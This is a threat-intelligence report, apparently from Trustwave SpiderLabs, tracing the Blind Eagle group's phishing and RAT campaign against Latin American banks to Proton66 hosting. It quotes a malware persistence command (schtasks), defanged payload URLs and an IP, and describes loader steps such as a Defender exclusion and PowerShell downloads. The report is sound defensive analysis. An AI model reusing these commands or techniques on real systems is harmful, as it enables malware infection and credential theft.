Tracing Blind Eagle to Proton66
Trustwave SpiderLabs has assessed with high confidence that the threat group Blind Eagle, aka APT-C-36, is associated with the Russian bulletproof hosting service provider Proton66. Blind Eagle is a threat actor actively targeting organizations across Latin America, with a notable focus on Colombian financial institutions.
Trustwave SpiderLabs, which has been tracking Proton66 for the last several months, was able to make this connection by pivoting from Proton66-linked assets, which led to the identification of another active threat cluster relying on the same ASN infrastructure.
Pivoting identified what is assessed to be one of its most recent and operationally active infrastructure clusters, characterized by strong interconnections across multiple domains and IP address clusters. This infrastructure exclusively leverages Visual Basic Script (VBS) files as its initial attack vector, relies heavily on free Dynamic DNS (DDNS) services, and deploys readily available Remote Access Trojans (RATs) as a second-stage malware.
As for the starting pivot point of this analysis from Proton66 OOO infrastructure, one notable case involved a set of domains following a certain naming pattern that began appearing in summer 2024. These domains all resolved to the IP address 45.135.232[.]38, which is part of a netblock associated with Proton66 OOO.
Figure 1. DuckDNS.org domain registrations with a similar naming pattern, starting on August 12, 2024.
The domains in question were used to host a variety of malicious content, including phishing pages and VBS scripts that serve as the initial stage of malware deployment. These scripts act as loaders for second-stage tools, which, in this campaign, are limited to publicly available and often open-source RATs. Notably, an analysis of some of the VBS codes also revealed overlaps with previously analyzed samples generated by Vbs-Crypter, linked to “Crypters and Tools” – a subscription-based service. This crypter is commonly used to obfuscate and pack VBS payloads, hindering static detection. The presence of such artifacts suggests that the threat actors behind this campaign leveraged the service to generate their loaders.
Figure 2. “Crypters And Tools” Telegram advertisement.
Despite the potentially high-value targeting, there is little evidence that the threat actors made a concerted effort to obscure their infrastructure. On the contrary, numerous open directories (opendirs) were discovered throughout the infrastructure, many of which hosted identical malicious files. In some of the more egregious cases, these directories contain complete phishing pages impersonating legitimate Colombian banks and financial institutions, along with first-stage malware designed to initiate the infection. In one of the identified clusters, the threat actors created phishing pages designed to impersonate several well-known Colombian financial institutions, including Bancolombia, BBVA, Banco Caja Social, and Davivienda.
Figure 3. Bancolombia phishing page.
Figure 4. Davivienda phishing page.
These phishing sites were designed to harvest user credentials and other sensitive information. The sites include HTML, CSS, and image files that replicate the appearance of legitimate banking login portals. In addition to the phishing pages, this specific set of infrastructure also hosted various VBS scripts that serve as the first stage of malware deployment. Notably identified samples include download-and-run scripts that retrieve encrypted executable files from a remote server.
Figure 5. Code example that checks whether the VBS file is running with admin privileges and, if not, uses Windows scripting methods to re-execute itself with elevated permissions. Upon successful escalation, it adds an exclusion for the entire C:\ drive in Defender.
Figure 6. Code example that deletes Windows Registry keys related to COM/ActiveX classes (Software\Classes), Component identifiers (CLSID) and WOW6432Node paths, as a cleanup step.
And while some have a distinct, narrow purpose, the majority work solely as a first-stage loader for the same selection of commodity second-stage RATs and following the same pattern. After cleaning between 6,000 to 20,000 lines, which mostly consist of comments, it’s observed that the first part in most of them initially creates the scheduled task:
Figure 7. "schtasks /create /tn coJb /tr "%TEMP%\GLPd.vbs" /sc minute /mo 1 " example within one of the VBS samples.
The second part decodes a Base64 string, which is then executed via PowerShell:
Figure 8. Deobfuscated and decoded example
It then downloads the next payload using resources such as paste.ee , textbin.net, store3.gofile.io or directly referring to IPv4 addresses:
Figure 9. Examples with hxxps://paste[.]ee/r/jNJfecjT/0, hosted on hxxps://textbin[.]net/raw/xsi2eulwpw
The next payload is typically a file with an MZ header that will be renamed, in this case as dll02.txt, which is a DLL file that will load the final payload, which will be downloaded from another URL. The file is another Base64 string that will also decode to an MZ file, and the pattern concludes with the final payloads, which are either Remcos or AsyncRATs for this specific cluster, that are then used to establish command and control (C2) with the management panel.
Figure 10. Deobfuscated example.
In one observed case, such a web-based botnet panel featured a Brazilian Portuguese-language written user interface and included a fully functional dashboard used to manage compromised hosts. This panel contained victim logs, deployment paths for initial-stage droppers, and links to the same publicly accessible, open-source RAT payloads, specifically AsyncRAT variants.
Figure 11. Botnet panel – Dashboard showing a list of infected machines (264 at the time of analysis, primarily based in Argentina) and four buttons/options in the last column to manage them.
The botnet management interface allows operators to control infected machines, retrieve exfiltrated data, and interact with infected endpoints through a broad set of capabilities typically found in commodity RAT management suites.
Figures 12 and 13. Contextual control options are displayed after selecting an individual victim within the botnet panel interface, showing the range of post-compromise actions available to the operator, including command execution, file exfiltration, and payload deployment from a specified URL.
This level of access provided through the exposed botnet panel illustrates not only the operational simplicity of the campaign but also reinforces the minimal emphasis placed by the threat actors on infrastructure compartmentalization or concealment — exhibiting a clear sign of prioritizing rapid deployment and accessibility over stealth or long-term sustainability. Each component of the infrastructure — including malware hosting servers, C2 panels, and phishing-related files — is hosted on domains that exhibit consistent naming patterns, SSL certificate reuse, and shared artifacts. Whether due to oversight or intent, the infrastructure shows minimal effort toward segmentation or concealment. Many components, including the above examples of C2 panel and VBS files, were publicly accessible via open directories and often lacked basic segmentation.
This ongoing activity underscores how unsophisticated threat infrastructures can still result in successful compromises, particularly when paired with phishing lures tailored to specific regional targets. While Colombian financial institutions remain a primary focus, the broader pattern suggests an increasing capability to scale operations across the Latin American (LATAM) region.
Organizations in LATAM, especially within the financial sector, should maintain heightened vigilance around banking-themed emails, enforce robust email filtering, and regularly train staff to identify localized phishing techniques. Organizations can also benefit from using advanced email filtering solutions like Trustwave MailMarshal to detect and block malicious emails that may contain harmful attachments or links. Proactive monitoring for regionally targeted infrastructure and threat indicators can significantly reduce the risk of compromise.
IoC
